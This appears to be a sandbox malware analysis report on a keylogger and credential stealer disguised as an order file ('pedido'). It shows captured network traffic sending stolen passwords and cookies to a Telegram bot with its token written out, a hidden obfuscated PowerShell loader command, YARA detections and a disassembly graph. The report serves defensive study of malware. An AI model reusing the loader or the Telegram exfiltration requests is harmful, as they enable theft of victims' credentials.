                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-16 15:33:54 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2024-12-16 15:33:54 UTC877INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:54 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                          Age: 352003
                                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c0bCHPxJWzhYQk9cOvGybd5v%2BfUSGqoBKXYu7JLeu5FCxpQCQkiTwUUXuRQFR5KRzebvwFCYfcQ9SiKpOekHe%2B1AhlT0AvqATluI6UNdaBxtNU2V5tvMV%2BwMG%2BiZkdIdUqa2i822"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8f2fbc097ca28ca8-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2000&min_rtt=2000&rtt_var=1000&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4238&recv_bytes=699&delivery_rate=51968&cwnd=162&unsent_bytes=0&cid=6f3d5ada0d0d3b37&ts=516&x=0"
                                                                                                                                                                          2024-12-16 15:33:54 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          11192.168.2.449880149.154.167.2204438000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-16 15:33:56 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745773%0D%0ADate%20and%20Time:%2017/12/2024%20/%2018:38:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20745773%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                          Host: api.telegram.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2024-12-16 15:33:57 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:33:56 GMT
                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                          Content-Length: 55
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                          2024-12-16 15:33:57 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          12192.168.2.449901149.154.167.2204438000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-16 15:34:04 UTC344OUTPOST /bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument?chat_id=7763958191&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd1f520a1e05ec
                                                                                                                                                                          Host: api.telegram.org
                                                                                                                                                                          Content-Length: 581
                                                                                                                                                                          2024-12-16 15:34:04 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 35 32 30 61 31 65 30 35 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 37 34 35 37 37 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 33 3a 32 34 0d
                                                                                                                                                                          Data Ascii: --------------------------8dd1f520a1e05ecContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:745773Date and Time: 16/12/2024 / 10:33:24
                                                                                                                                                                          2024-12-16 15:34:05 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:34:04 GMT
                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                          2024-12-16 15:34:05 UTC527INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 36 38 39 31 33 33 37 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 6f 6c 66 6c 6f 67 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 37 36 33 39 35 38 31 39 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 61 76 69 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 41 6c 70 68 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 6f 6c 66 5f 6c 6f 67 73 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 36 33 32 34 34 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":46,"from":{"id":7268913379,"is_bot":true,"first_name":"Logs","username":"wolflogsbot"},"chat":{"id":7763958191,"first_name":"David","last_name":"Alpha","username":"wolf_logs","type":"private"},"date":1734363244,"document"


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          13192.168.2.449907149.154.167.2204438000C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-16 15:34:08 UTC350OUTPOST /bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument?chat_id=7763958191&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd1f7597775302
                                                                                                                                                                          Host: api.telegram.org
                                                                                                                                                                          Content-Length: 7046
                                                                                                                                                                          2024-12-16 15:34:08 UTC7046OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 37 35 39 37 37 37 35 33 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 37 34 35 37 37 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f
                                                                                                                                                                          Data Ascii: --------------------------8dd1f7597775302Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:745773Date and Time: 16/12/2024 /
                                                                                                                                                                          2024-12-16 15:34:08 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                          Date: Mon, 16 Dec 2024 15:34:08 GMT
                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                          Content-Length: 538
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                          2024-12-16 15:34:08 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 36 38 39 31 33 33 37 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 6f 6c 66 6c 6f 67 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 37 36 33 39 35 38 31 39 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 61 76 69 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 41 6c 70 68 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 6f 6c 66 5f 6c 6f 67 73 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 36 33 32 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":47,"from":{"id":7268913379,"is_bot":true,"first_name":"Logs","username":"wolflogsbot"},"chat":{"id":7763958191,"first_name":"David","last_name":"Alpha","username":"wolf_logs","type":"private"},"date":1734363248,"document"


                                                                                                                                                                          Statistics

                                                                                                                                                                          CPU Usage

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Memory Usage

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                          Behavior

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          System Behavior

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:0
                                                                                                                                                                          Start time:10:32:01
                                                                                                                                                                          Start date:16/12/2024
                                                                                                                                                                          Path:C:\Users\user\Desktop\pedido-035241.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\pedido-035241.exe"
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          File size:1'093'536 bytes
                                                                                                                                                                          MD5 hash:68AD57514CFB4E1CB4529556DBBC9B73
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:1
                                                                                                                                                                          Start time:10:32:04
                                                                                                                                                                          Start date:16/12/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) "
                                                                                                                                                                          Imagebase:0x6c0000
                                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:2
                                                                                                                                                                          Start time:10:32:04
                                                                                                                                                                          Start date:16/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:6
                                                                                                                                                                          Start time:10:33:03
                                                                                                                                                                          Start date:16/12/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                                                          Imagebase:0xb50000
                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2962912276.0000000004C2B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Disassembly

                                                                                                                                                                          Reset < >

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:22.2%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                            Signature Coverage:17%
                                                                                                                                                                            Total number of Nodes:1383
                                                                                                                                                                            Total number of Limit Nodes:34
                                                                                                                                                                            execution_graph 3209 401941 3210 401943 3209->3210 3215 402da6 3210->3215 3216 402db2 3215->3216 3261 406544 3216->3261 3219 401948 3221 405c13 3219->3221 3303 405ede 3221->3303 3224 405c52 3227 405d7d 3224->3227 3317 406507 lstrcpynW 3224->3317 3225 405c3b DeleteFileW 3226 401951 3225->3226 3227->3226 3346 40683d FindFirstFileW 3227->3346 3229 405c78 3230 405c8b 3229->3230 3231 405c7e lstrcatW 3229->3231 3318 405e22 lstrlenW 3230->3318 3232 405c91 3231->3232 3235 405ca1 lstrcatW 3232->3235 3236 405c97 3232->3236 3238 405cac lstrlenW FindFirstFileW 3235->3238 3236->3235 3236->3238 3241 405d72 3238->3241 3259 405cce 3238->3259 3239 405d9b 3349 405dd6 lstrlenW CharPrevW 3239->3349 3241->3227 3244 405d55 FindNextFileW 3247 405d6b FindClose 3244->3247 3244->3259 3245 405bcb 5 API calls 3246 405dad 3245->3246 3248 405db1 3246->3248 3249 405dc7 3246->3249 3247->3241 3248->3226 3252 405569 24 API calls 3248->3252 3251 405569 24 API calls 3249->3251 3251->3226 3254 405dbe 3252->3254 3253 405c13 60 API calls 3253->3259 3256 4062c7 36 API calls 3254->3256 3255 405569 24 API calls 3255->3244 3257 405dc5 3256->3257 3257->3226 3259->3244 3259->3253 3259->3255 3322 406507 lstrcpynW 3259->3322 3323 405bcb 3259->3323 3331 405569 3259->3331 3342 4062c7 MoveFileExW 3259->3342 3262 406551 3261->3262 3263 406774 3262->3263 3266 406742 lstrlenW 3262->3266 3267 406659 GetSystemDirectoryW 3262->3267 3271 406544 10 API calls 3262->3271 3272 40666c GetWindowsDirectoryW 3262->3272 3273 4066e3 lstrcatW 3262->3273 3274 406544 10 API calls 3262->3274 3275 40678e 5 API calls 3262->3275 3276 40669b SHGetSpecialFolderLocation 3262->3276 3287 4063d5 3262->3287 3292 40644e wsprintfW 3262->3292 3293 406507 lstrcpynW 3262->3293 3264 402dd3 3263->3264 3294 406507 lstrcpynW 3263->3294 3264->3219 3278 40678e 3264->3278 3266->3262 3267->3262 3271->3266 3272->3262 3273->3262 3274->3262 3275->3262 3276->3262 3277 4066b3 SHGetPathFromIDListW CoTaskMemFree 3276->3277 3277->3262 3279 40679b 3278->3279 3281 406804 CharNextW 3279->3281 3282 406811 3279->3282 3285 4067f0 CharNextW 3279->3285 3286 4067ff CharNextW 3279->3286 3299 405e03 3279->3299 3280 406816 CharPrevW 3280->3282 3281->3279 3281->3282 3282->3280 3283 406837 3282->3283 3283->3219 3285->3279 3286->3281 3295 406374 3287->3295 3290 406439 3290->3262 3291 406409 RegQueryValueExW RegCloseKey 3291->3290 3292->3262 3293->3262 3294->3264 3296 406383 3295->3296 3297 406387 3296->3297 3298 40638c RegOpenKeyExW 3296->3298 3297->3290 3297->3291 3298->3297 3300 405e09 3299->3300 3301 405e1f 3300->3301 3302 405e10 CharNextW 3300->3302 3301->3279 3302->3300 3352 406507 lstrcpynW 3303->3352 3305 405eef 3353 405e81 CharNextW CharNextW 3305->3353 3308 405c33 3308->3224 3308->3225 3309 40678e 5 API calls 3315 405f05 3309->3315 3310 405f36 lstrlenW 3311 405f41 3310->3311 3310->3315 3313 405dd6 3 API calls 3311->3313 3312 40683d 2 API calls 3312->3315 3314 405f46 GetFileAttributesW 3313->3314 3314->3308 3315->3308 3315->3310 3315->3312 3316 405e22 2 API calls 3315->3316 3316->3310 3317->3229 3319 405e30 3318->3319 3320 405e42 3319->3320 3321 405e36 CharPrevW 3319->3321 3320->3232 3321->3319 3321->3320 3322->3259 3359 405fd2 GetFileAttributesW 3323->3359 3326 405bf8 3326->3259 3327 405be6 RemoveDirectoryW 3329 405bf4 3327->3329 3328 405bee DeleteFileW 3328->3329 3329->3326 3330 405c04 SetFileAttributesW 3329->3330 3330->3326 3332 405584 3331->3332 3333 405626 3331->3333 3334 4055a0 lstrlenW 3332->3334 3335 406544 17 API calls 3332->3335 3333->3259 3336 4055c9 3334->3336 3337 4055ae lstrlenW 3334->3337 3335->3334 3339 4055dc 3336->3339 3340 4055cf SetWindowTextW 3336->3340 3337->3333 3338 4055c0 lstrcatW 3337->3338 3338->3336 3339->3333 3341 4055e2 SendMessageW SendMessageW SendMessageW 3339->3341 3340->3339 3341->3333 3343 4062e8 3342->3343 3344 4062db 3342->3344 3343->3259 3362 40614d 3344->3362 3347 406853 FindClose 3346->3347 3348 405d97 3346->3348 3347->3348 3348->3226 3348->3239 3350 405df2 lstrcatW 3349->3350 3351 405da1 3349->3351 3350->3351 3351->3245 3352->3305 3354 405e9e 3353->3354 3357 405eb0 3353->3357 3356 405eab CharNextW 3354->3356 3354->3357 3355 405ed4 3355->3308 3355->3309 3356->3355 3357->3355 3358 405e03 CharNextW 3357->3358 3358->3357 3360 405bd7 3359->3360 3361 405fe4 SetFileAttributesW 3359->3361 3360->3326 3360->3327 3360->3328 3361->3360 3363 4061a3 GetShortPathNameW 3362->3363 3364 40617d 3362->3364 3366 4062c2 3363->3366 3367 4061b8 3363->3367 3389 405ff7 GetFileAttributesW CreateFileW 3364->3389 3366->3343 3367->3366 3369 4061c0 wsprintfA 3367->3369 3368 406187 CloseHandle GetShortPathNameW 3368->3366 3370 40619b 3368->3370 3371 406544 17 API calls 3369->3371 3370->3363 3370->3366 3372 4061e8 3371->3372 3390 405ff7 GetFileAttributesW CreateFileW 3372->3390 3374 4061f5 3374->3366 3375 406204 GetFileSize GlobalAlloc 3374->3375 3376 406226 3375->3376 3377 4062bb CloseHandle 3375->3377 3391 40607a ReadFile 3376->3391 3377->3366 3382 406245 lstrcpyA 3387 406267 3382->3387 3383 406259 3384 405f5c 4 API calls 3383->3384 3384->3387 3385 40629e SetFilePointer 3398 4060a9 WriteFile 3385->3398 3387->3385 3389->3368 3390->3374 3392 406098 3391->3392 3392->3377 3393 405f5c lstrlenA 3392->3393 3394 405f9d lstrlenA 3393->3394 3395 405fa5 3394->3395 3396 405f76 lstrcmpiA 3394->3396 3395->3382 3395->3383 3396->3395 3397 405f94 CharNextA 3396->3397 3397->3394 3399 4060c7 GlobalFree 3398->3399 3399->3377 3400 4015c1 3401 402da6 17 API calls 3400->3401 3402 4015c8 3401->3402 3403 405e81 4 API calls 3402->3403 3415 4015d1 3403->3415 3404 401631 3406 401663 3404->3406 3407 401636 3404->3407 3405 405e03 CharNextW 3405->3415 3409 401423 24 API calls 3406->3409 3427 401423 3407->3427 3416 40165b 3409->3416 3414 40164a SetCurrentDirectoryW 3414->3416 3415->3404 3415->3405 3417 401617 GetFileAttributesW 3415->3417 3419 405ad2 3415->3419 3422 405a38 CreateDirectoryW 3415->3422 3431 405ab5 CreateDirectoryW 3415->3431 3417->3415 3434 4068d4 GetModuleHandleA 3419->3434 3423 405a85 3422->3423 3424 405a89 GetLastError 3422->3424 3423->3415 3424->3423 3425 405a98 SetFileSecurityW 3424->3425 3425->3423 3426 405aae GetLastError 3425->3426 3426->3423 3428 405569 24 API calls 3427->3428 3429 401431 3428->3429 3430 406507 lstrcpynW 3429->3430 3430->3414 3432 405ac5 3431->3432 3433 405ac9 GetLastError 3431->3433 3432->3415 3433->3432 3435 4068f0 3434->3435 3436 4068fa GetProcAddress 3434->3436 3440 406864 GetSystemDirectoryW 3435->3440 3438 405ad9 3436->3438 3438->3415 3439 4068f6 3439->3436 3439->3438 3441 406886 wsprintfW LoadLibraryExW 3440->3441 3441->3439 4067 401c43 4068 402d84 17 API calls 4067->4068 4069 401c4a 4068->4069 4070 402d84 17 API calls 4069->4070 4071 401c57 4070->4071 4072 401c6c 4071->4072 4073 402da6 17 API calls 4071->4073 4074 402da6 17 API calls 4072->4074 4078 401c7c 4072->4078 4073->4072 4074->4078 4075 401cd3 4077 402da6 17 API calls 4075->4077 4076 401c87 4079 402d84 17 API calls 4076->4079 4080 401cd8 4077->4080 4078->4075 4078->4076 4081 401c8c 4079->4081 4083 402da6 17 API calls 4080->4083 4082 402d84 17 API calls 4081->4082 4084 401c98 4082->4084 4085 401ce1 FindWindowExW 4083->4085 4086 401cc3 SendMessageW 4084->4086 4087 401ca5 SendMessageTimeoutW 4084->4087 4088 401d03 4085->4088 4086->4088 4087->4088 4089 4028c4 4090 4028ca 4089->4090 4091 4028d2 FindClose 4090->4091 4092 402c2a 4090->4092 4091->4092 4103 4016cc 4104 402da6 17 API calls 4103->4104 4105 4016d2 GetFullPathNameW 4104->4105 4106 4016ec 4105->4106 4112 40170e 4105->4112 4108 40683d 2 API calls 4106->4108 4106->4112 4107 401723 GetShortPathNameW 4109 402c2a 4107->4109 4110 4016fe 4108->4110 4110->4112 4113 406507 lstrcpynW 4110->4113 4112->4107 4112->4109 4113->4112 4114 401e4e GetDC 4115 402d84 17 API calls 4114->4115 4116 401e60 GetDeviceCaps MulDiv ReleaseDC 4115->4116 4117 402d84 17 API calls 4116->4117 4118 401e91 4117->4118 4119 406544 17 API calls 4118->4119 4120 401ece CreateFontIndirectW 4119->4120 4121 402638 4120->4121 4122 402950 4123 402da6 17 API calls 4122->4123 4124 40295c 4123->4124 4125 402972 4124->4125 4126 402da6 17 API calls 4124->4126 4127 405fd2 2 API calls 4125->4127 4126->4125 4128 402978 4127->4128 4150 405ff7 GetFileAttributesW CreateFileW 4128->4150 4130 402985 4131 402a3b 4130->4131 4132 4029a0 GlobalAlloc 4130->4132 4133 402a23 4130->4133 4134 402a42 DeleteFileW 4131->4134 4135 402a55 4131->4135 4132->4133 4136 4029b9 4132->4136 4137 4032b4 35 API calls 4133->4137 4134->4135 4151 4034af SetFilePointer 4136->4151 4139 402a30 CloseHandle 4137->4139 4139->4131 4140 4029bf 4141 403499 ReadFile 4140->4141 4142 4029c8 GlobalAlloc 4141->4142 4143 4029d8 4142->4143 4144 402a0c 4142->4144 4146 4032b4 35 API calls 4143->4146 4145 4060a9 WriteFile 4144->4145 4147 402a18 GlobalFree 4145->4147 4149 4029e5 4146->4149 4147->4133 4148 402a03 GlobalFree 4148->4144 4149->4148 4150->4130 4151->4140 4152 404ed0 GetDlgItem GetDlgItem 4153 404f22 7 API calls 4152->4153 4161 405147 4152->4161 4154 404fc9 DeleteObject 4153->4154 4155 404fbc SendMessageW 4153->4155 4156 404fd2 4154->4156 4155->4154 4157 405009 4156->4157 4162 406544 17 API calls 4156->4162 4159 404463 18 API calls 4157->4159 4158 405229 4160 4052d5 4158->4160 4169 405282 SendMessageW 4158->4169 4195 40513a 4158->4195 4163 40501d 4159->4163 4164 4052e7 4160->4164 4165 4052df SendMessageW 4160->4165 4161->4158 4180 4051b6 4161->4180 4206 404e1e SendMessageW 4161->4206 4166 404feb SendMessageW SendMessageW 4162->4166 4168 404463 18 API calls 4163->4168 4172 405300 4164->4172 4173 4052f9 ImageList_Destroy 4164->4173 4181 405310 4164->4181 4165->4164 4166->4156 4186 40502e 4168->4186 4175 405297 SendMessageW 4169->4175 4169->4195 4170 40521b SendMessageW 4170->4158 4171 4044ca 8 API calls 4176 